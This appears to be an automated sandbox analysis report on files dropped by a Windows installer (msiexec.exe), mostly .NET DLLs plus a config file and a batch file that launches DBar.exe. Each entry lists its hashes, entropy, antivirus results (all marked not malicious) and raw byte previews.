                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections></configSections>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.2" newVersion="4.0.1.2" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Threading.Tasks.Extensions" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.2.0.1" newVersion="4.2.0.1" />
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):24576
                      Entropy (8bit):5.024763117402097
                      Encrypted:false
                      SSDEEP:
                      MD5:EA01DBD9C6141F815AD05EF54D41CBAC
                      SHA1:02ACB3F60CF1EA9B3B12F1FDB7B08E828491EBD6
                      SHA-256:FF46019DCF4051CB9CAD986D1E5BFB06BF1183DE7F53F22428D2B5DB5A05D277
                      SHA-512:4B28F1194DA28BAD4B6F4046DF702394D00A92EDA77E77B1BA9563384A96ED41B1E9F1FE1B118DA0151C7AF2FF59E3D54B640F144939A669BA3A419BF5BA7A74
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.d...........!.....X...........v... ........@.. ....................................`.................................hv..S.......x............................................................................ ............... ..H............text....V... ...X.................. ..`.rsrc...x............Z..............@..@.reloc...............^..............@..B.................v......H........S..."...........................................................0...........%(.....}......}....*....0...........{....*..0...........{....*..0.."....... ...@..........Hh ..>..........Hh..E................. .............Hh+. ..^=..........Hh+.,.+. .............Hh&+. .............Hh+.. ...$.........Hh9....r...p.....(.........(.................s....s....(.........r...p.....(.........(............s....s....(.........r#..p.....(.........(.... ................s...........s.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):228352
                      Entropy (8bit):7.077870553774561
                      Encrypted:false
                      SSDEEP:
                      MD5:908668FFDE26AB371A2EF711206AA05D
                      SHA1:95B60C69C199EDD937960D22B793F5E6143C00AC
                      SHA-256:8E136EC981ED7D7ABF0C8153DB901FCD9E7A311A61E209D88A9CA2B51FC17838
                      SHA-512:36C1EF092EE2DDD9640C6C74AB2D76BB61F62415892B9BCDDF93772B604C4B45C9EF88834AECAC76EF2F0FA38317F74B889CD26436AB0C6A998B803CDF7A023E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E............." ..0..t............... ........... ....................................`.....................................O......................................T............................................ ............... ..H............text....r... ...t.................. ..`.rsrc................v..............@..@.reloc...............z..............@..B.......................H........p.............d$..pl............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....}.....#....Q..?}.....(....*..(....}.....#....Q..?}.....(......(....*..0............r...(....o....ur...o....u.....s<...%.(....o0...%.(....o4...%.(....o8...%~....s....%.(....o....(....&%~....s....%.o....(....&%~....r...ps ...%.o....(....&%~!...r...ps ...%.o....(....&s"...%.o#...%.o$...%.o%...%.o&...*...0...........~....%-.&~.........
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):107008
                      Entropy (8bit):5.934347290077456
                      Encrypted:false
                      SSDEEP:
                      MD5:65EE10962E74C5E23390B86C8113FA36
                      SHA1:35B0235ED645C5B34CB63780B50572CA7110C4C8
                      SHA-256:5D1B103DF18470364F0B8F8B5034FFF446C40C13CE35C5F9CA9452F4F610A6D9
                      SHA-512:D36FA7D5FEDBA0FD1064875F4FCB79480C04FC8E5E1DD169AAC8C0921310AF92AA25B10D9BB92B9ABE1B4538AA58AF8EF25009846E94D6A710D832B8BF13836B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g............" ..0.................. ........... ....................................`.....................................O......................................T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.........................................................................{ ...*..{!...*V.(".....} .....}!...*...0..A........u........4.,/(#....{ ....{ ...o$...,.(%....{!....{!...o&...*.*.*. '.(k )UU.Z(#....{ ...o'...X )UU.Z(%....{!...o(...X*...0..b........r...p......%..{ ......%q.........-.&.+.......o)....%..{!......%q.........-.&.+.......o)....(*...*>..su...%.}^...*...0...........(+...,..*...(....o.....8t....o......-2.{,....{-.....g...%..".o.....(/...s0...sk....88....{,...r
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):38400
                      Entropy (8bit):5.728308339702499
                      Encrypted:false
                      SSDEEP:
                      MD5:3D6BB44B26E6F139E7921BB6504AD6D7
                      SHA1:BDFBE4C5083FFD278B7E29812DF0DEFDA7251FD7
                      SHA-256:2F9D38978EE427B659F5EBE33AFAD2E5A22D6CC7FE05B784750526B6F0C609BD
                      SHA-512:1E164B76B5B94F5E15C695FDFC48A84D947AB6F802A379EE753B8C3DC18EECFBDED631A5559DB170B600D68486D6315567E8B9AB1B17D27049087965BE4EB267
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|..........." ..0.................. ........... ....................................`.................................i...O.......,...............................T............................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H.......tL..8]............................................................{!...*..{"...*V.(#.....}!.....}"...*...0..A........u........4.,/($....{!....{!...o%...,.(&....{"....{"...o'...*.*.*. ?Y.. )UU.Z($....{!...o(...X )UU.Z(&....{"...o)...X*...0..b........r...p......%..{!......%q.........-.&.+.......o*....%..{"......%q.........-.&.+.......o*....(+...*..{,...*..{-...*V.(#.....},.....}-...*.0..A........u........4.,/($....{,....{,...o%...,.(&....{-....{-...o'...*.*.*. (... )UU.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):169472
                      Entropy (8bit):5.611329908452965
                      Encrypted:false
                      SSDEEP:
                      MD5:7939C27033A7C0E80022A788C537275D
                      SHA1:DF3260A60A4223BD0666D1D13B15FB4E4BC78AF7
                      SHA-256:37E643B9EF95D1FB21DE79AD0B19825FC15AAAF43232C15E030E4C3BDBA07714
                      SHA-512:798CD9A213AD3750521CD6EC2FC4E4806C88DB50E9C30A6809F067C3A063731D08B67DC9662AA3572AA40C3BA5A037ACA7B590F0D9B4214D4AB256525AF6D6B6
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P.!c.........." ..0.............f.... ........... ...............................g....`.....................................O................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................H.......H.......x>...e..................\.........................................{....*"..}....*....0..#...........i...+...Y.....(.......X...0..f*..0..>..........o0......+*..Y...o1...% ...._...c..(.......(.......X...0..f*&...(....*.0..:........ ...._....c.....{....(....}.......{....(....}.....{....f*R~......a ...._...da*..(2...*n .........%.....(3........*:.(4.....}....*..{....*V..}.....(2.....}....*..{....*"..}....*..{....*..{....*..{....*....0..3..........|....(5...,..|....(6....+
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):26752
                      Entropy (8bit):6.512503595653532
                      Encrypted:false
                      SSDEEP:
                      MD5:970B6E6478AE3AB699F277D77DE0CD19
                      SHA1:5475CB28998D419B4714343FFA9511FF46322AC2
                      SHA-256:5DC372A10F345B1F00EC6A8FA1A2CE569F7E5D63E4F1F8631BE367E46BFA34F4
                      SHA-512:F3AD2088C5D3FCB770C6D8212650EED95507E107A34F9468CA9DB99DEFD8838443A95E0B59A5A6CB65A18EBBC529110C5348513A321B44223F537096C6D7D6E0
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$:............" ..0..4...........S... ...`....... ....................................`..................................S..O....`...............@...(...........R..T............................................ ............... ..H............text....3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............>..............@..B.................S......H........'..P*..................,R........................................(....*..(....*^.(.......1...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(.......2...%...}....*:.(......}....*..{....*z.(......}.......2...%...}....*V.(......}......}....*..{....*..{....*:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21216
                      Entropy (8bit):6.900655456226697
                      Encrypted:false
                      SSDEEP:
                      MD5:76B8D417C2F6416FA81EACC45977CEA2
                      SHA1:7B249C6390DFC90EF33F9A697174E363080091EF
                      SHA-256:5EAA2E82A26B0B302280D08F54DC9DA25165DD0E286BE52440A271285D63F695
                      SHA-512:3B510CDC45C94BE383C91687C2CB01A501BA34E3FBB66346214FC576D6F0E63C77D1D09C6419FC907F5B083387A7046C0670377AD2E00C3EC2E731275739F9C7
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@..0................>...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):542208
                      Entropy (8bit):5.835282203203973
                      Encrypted:false
                      SSDEEP:
                      MD5:54FE9A2748C4A0F282D4EC91E3CADC16
                      SHA1:970B783A697D893ECD4916DD86B5FF7574896C9E
                      SHA-256:E6FA9D9E34FF3BF63CE782654B14E4B54A3ABD1022C87BC099032C2948157672
                      SHA-512:C7D567E3C039F98F3A99249B2D9BC2186C34EFD73EEC421331732D2307A8AF940911381E27B015F58D0F65871BB4B038CC0F27D3FA495ACD08994226BB033B7F
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3JT...........!.....<...........Z... ...`....... ....................................@.................................HZ..S....`...............................Y............................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................Z......H............*...............N............................................s'...}......}.....((....{.....o)...*...0..D........%{.....X}.....{.....{....o*.../!..{.....{....o+...(,..........T.*.*.0..$........{.....X...{....o*....Y1..*..}.....*&..}.....*R..{....o-...s....Q.*B.,...~....o/...*2.,....o0...*6..~....(...+*Z.........(......(....*..{....*"..}....*..{....*"..}....*...(......(....3...(......(......*.*...(.......*~.,..u....-..*.q..........(....*.0..%........(.......(3.....
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):104960
                      Entropy (8bit):5.840005667875635
                      Encrypted:false
                      SSDEEP:
                      MD5:9531B41519156855A45C46F0B379A784
                      SHA1:00B857F09DCF0C71DAB40C1A8C4C54D411FDB197
                      SHA-256:418B5E7A96F9A6105CC6FE45896A9164E79C8849F40BE23A411B5563A8E3A0D0
                      SHA-512:10034288101D235CB7AF984FD6A0DB11C7F56DBED648A71596B8B0C93F68D5AC5CF00BE033153A91E71A311374B220507F07AA5B6E1849A80930D37A5C2577F0
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3JT...........!................^.... ........... ....................................@.....................................W.......h........................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B................@.......H.......H...............`r...!...........................................0..c.......(Q....-.r...ps....z.o....(.....(;....(.....o.....(?.....(J...-#. W...3.(....r...ps....z(....s....z*..0..........(Q...(A.....(J...-.(....s....z*..0..........(Q...(B.....(J...-.(....s....z*..0..$.......(Q.......(>.....(J...-.(....s....z.*2(Q....(=...*....0..L.......(Q....-.r...ps....z.o.....o....(@..... .@..3.(....s....z. W...3.(....s....z*..(....*"..(....*&...(....*&...( ...*&...(!...*V.(".....
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):145288
                      Entropy (8bit):6.0680769527637715
                      Encrypted:false
                      SSDEEP:
                      MD5:EC5A1ABEE150ABE698689211B07CD1EC
                      SHA1:AFFC3CB47DA8FE76986D271CDC3E7EA345CC04E5
                      SHA-256:B864DA9D88414877CEA9B1A016146265A5FB9D0E12F4DBB1DCCC0CC998119A54
                      SHA-512:A2B55B4FFC3F11546ED8D3457E98B986C089E25229BD687DA35D45D63E4860722E8B13826D3A3DAA1BE843CF3A4AE3DA4CF9B6FDCB5D1A4948648537E683789F
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............)... ...@....... ....................................`..................................(..O....@...................#...`......0(..8............................................ ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......d....B..........x...8....'......................................V!..e./....s.........*6.(/....{0...*..(1.......2...s3...o4....s5...}6...*....0..F........(7....{6...o8.....,0..+#..(9.........{6....o:........3...X...(7...2.*...0..J........{6....o;...,;(<...(v.........%......(=...o>....%..(?...o>....(@...sA...z*...0...........oB.....E............].......Y...*.oC...o%....+0.o#...........(D.....oE......{6.....(F....oG.....o ...-......u&.....,..o......oH...o%....+#.o#.....
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):701992
                      Entropy (8bit):5.940787194132384
                      Encrypted:false
                      SSDEEP:
                      MD5:081D9558BBB7ADCE142DA153B2D5577A
                      SHA1:7D0AD03FBDA1C24F883116B940717E596073AE96
                      SHA-256:B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3
                      SHA-512:2FDF035661F349206F58EA1FEED8805B7F9517A21F9C113E7301C69DE160F184C774350A12A710046E3FF6BAA37345D319B6F47FD24FBBA4E042D54014BEE511
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ..............................*^....`.....................................O.......................(..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):2204160
                      Entropy (8bit):6.151495060277431
                      Encrypted:false
                      SSDEEP:
                      MD5:E9801AFDF641FD532DDC8B35B839230C
                      SHA1:80721BFCAD7C4C98CAE054CC91248ADC115FB2E7
                      SHA-256:434DF6428C2CE4AED6026E06FECFDC9240A9FFFC4DBE92CE5D34EAB0A248C636
                      SHA-512:66718E03C06737BD489753835C0319FB2C80B2EA09CF9BF7AF0C8A7F15FDFF8127CCB19DA585C9AF701CA739264540B078336EEA173978C798794B5C9E8CBBD0
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............xA..xA..xA...A..xA..y@..xA..A..xA...A..xA..}@..xA..|@..xA..{@..xAq.q@..xAQ.|@..xAQ.}@..xAQ.y@..xA..yA/.xAq.}@..xAq.A..xA...A..xAq.z@..xARich..xA................PE..L......d...........!.....X...b...............p................................!...........@.....................................X..... .H....................0!.4......T...................HS......@...@............p...............H..H............text....W.......X.................. ..`.rdata..\....p.......\..............@..@.data...Tc.... ..H..................@....rsrc...H..... ......> .............@..@.reloc..4....0!....... .............@..B................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):70
                      Entropy (8bit):4.432924897170623
                      Encrypted:false
                      SSDEEP:
                      MD5:746D97E1F78CB20B1692EA173D52160F
                      SHA1:2824FD04F0DC934ED80076D17A251C44155BCBA9
                      SHA-256:C50AFE66CF3FD3DE4938D198938BC59B68781E74CE55EC1E7261FA410AB5B300
                      SHA-512:1230C2BB9AE623597D60508D955BA5B8EEF3E8FE081A56712F994DEF66AEDCC91E6B156B1B677E53C525CA76398FC0171C847902F9B68CA64A9006DC354E05A6
                      Malicious:false
                      Reputation:low
                      Preview:@echo off....set scriptpath=%~dp0..C:..CD %scriptpath%..start DBar.exe
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21176
                      Entropy (8bit):6.887075475210058
                      Encrypted:false
                      SSDEEP:
                      MD5:8CC4C7DFEB41B6C227488CE52D1A8E74
                      SHA1:93702135DB0646B893BABE030BD8DC15549FF0C2
                      SHA-256:9DC115AC4AADD6A94D87C7A8A3F61803CC25A3D73501D7534867DF6B0D8A0D39
                      SHA-512:E4DA7E3AE5CA31E566EA0475E83D69D998253FB6D689970703A5AD354A2AAD1BB78D49A2C038F0A3C84A188D091696191B04E4A39253DEB3B6CB310B72F02F97
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ..............................ZY....@..................................(..O....@...................>...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):20856
                      Entropy (8bit):6.425485073687783
                      Encrypted:false
                      SSDEEP:
                      MD5:ECDFE8EDE869D2CCC6BF99981EA96400
                      SHA1:2F410A0396BC148ED533AD49B6415FB58DD4D641
                      SHA-256:ACCCCFBE45D9F08FFEED9916E37B33E98C65BE012CFFF6E7FA7B67210CE1FEFB
                      SHA-512:5FC7FEE5C25CB2EEE19737068968E00A00961C257271B420F594E5A0DA0559502D04EE6BA2D8D2AAD77F3769622F6743A5EE8DAE23F8F993F33FB09ED8DB2741
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ....................................@..................................B..O....`..@...............x#...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21224
                      Entropy (8bit):6.941945190587086
                      Encrypted:false
                      SSDEEP:
                      MD5:559C98EB9633C7BA1BC813F8E6E0E9A5
                      SHA1:311F52B31611E6DC5FD4C0159BFA452C22980CA7
                      SHA-256:CC62F3B867D50083C2932061F20662C698D2E1A741C4D2F9DF1FD2D435E3EF3C
                      SHA-512:E241C16869D1CDBB2C6482A7C5B2AF93DE4BA0CEF8185B8826EEE35ECB174F35F7585C8AE0320F7F4F6B80F3BB5B3EDAE2383760F2F35637F03C3A0E38E0875C
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................X.....@.................................t)..O....@..D................>...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21224
                      Entropy (8bit):6.939816403058967
                      Encrypted:false
                      SSDEEP:
                      MD5:45FF71114047DBF934C90E17677FA994
                      SHA1:526C688E71A7D7410007AD5AA6EA8B83CACE76C5
                      SHA-256:529943C0CDF24F57E94BF03FAC5F40B94A638625027A02DF79E1E8CB5D9BC696
                      SHA-512:29684AC5391268EAA276196A6249364F6D23ABFE59BDC304A561CF326CEA6CD662FA04C05E15924FD6D3F9E9D1607992B8DCAD3F817CFE891580F9D9462FE9B7
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................>....@.................................p)..O....@..@................>...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21224
                      Entropy (8bit):6.942827969586567
                      Encrypted:false
                      SSDEEP:
                      MD5:B52C339601CB264F83DF72D802E98687
                      SHA1:8BBB7BADAAA912C1F17775E9ACDCAB389704C772
                      SHA-256:938DA38561DA54793944E95E94B6E11CF83AACD667487297D428FBCE1C06DC9C
                      SHA-512:287F08AB07827570F9F3EF48A6D7E5C186899A2704FB3DBAF36975F6BE7B29FB6695A69FAB85A6F09BDDEFB60C79052C3A33CF862651F892EB9D773D880B3AF8
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..P................>...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21696
                      Entropy (8bit):6.848992181946284
                      Encrypted:false
                      SSDEEP:
                      MD5:1D8AAFECA1EA565B257384D3F64864B0
                      SHA1:4D923B100142AFA2E0A8B7ACDB3A6DE6FEB91148
                      SHA-256:C2250E9E51B44D8AB8C5B892592766925F6580EE00B95026621D0AFB037C2707
                      SHA-512:99E4A226E1FABB348E7EF7C6FA56AD0CE4E4CF5D8569CE21881703DCA8D83A1C113FD5F440A4FC9E9B99A04AE8CF4490E17D62FFC09CFAC5A45678A4419EFDBB
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ..............................J.....@..................................*..O....@...................>...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21768
                      Entropy (8bit):6.880530414500754
                      Encrypted:false
                      SSDEEP:
                      MD5:6067ECBAB3C6DDDB6BF7C49C7948CAA8
                      SHA1:5F3DA777AF01DBC159BD8D9D97D5DC105918AFC5
                      SHA-256:22108E32E0B6E42F5F52A4CB17B9B6FA3DFD547ECD9EEF9C67226DBEC54D23E5
                      SHA-512:9F3E834B8342E0C7AA5CCC993B520D664B03F1F0091066C66067923E1D4991EFA03F63908552538C05F423AA2B696DE7C76993F71A7564F3E87662CB0FC00726
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ....................................@..................................)..O....@...................?...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21752
                      Entropy (8bit):6.916008128976572
                      Encrypted:false
                      SSDEEP:
                      MD5:2F39655CCFC010E32A7240D9BF5D0852
                      SHA1:20AEAED12DFB8D71E39687350EB12BC0DE372AF0
                      SHA-256:BFCD867F71C887429DFE008D7EC5D1853D15B3932D4CE8991694293477B5BE37
                      SHA-512:9769E59279A32F29C2F2C6970C81D3ED76FE3421B819DDFFC8FA98329F1B45300C737FDF71956672F80F69B3A75727D184F8C421E00B84E94163A86CB744A991
                      Malicious:false
                      Antivirus:
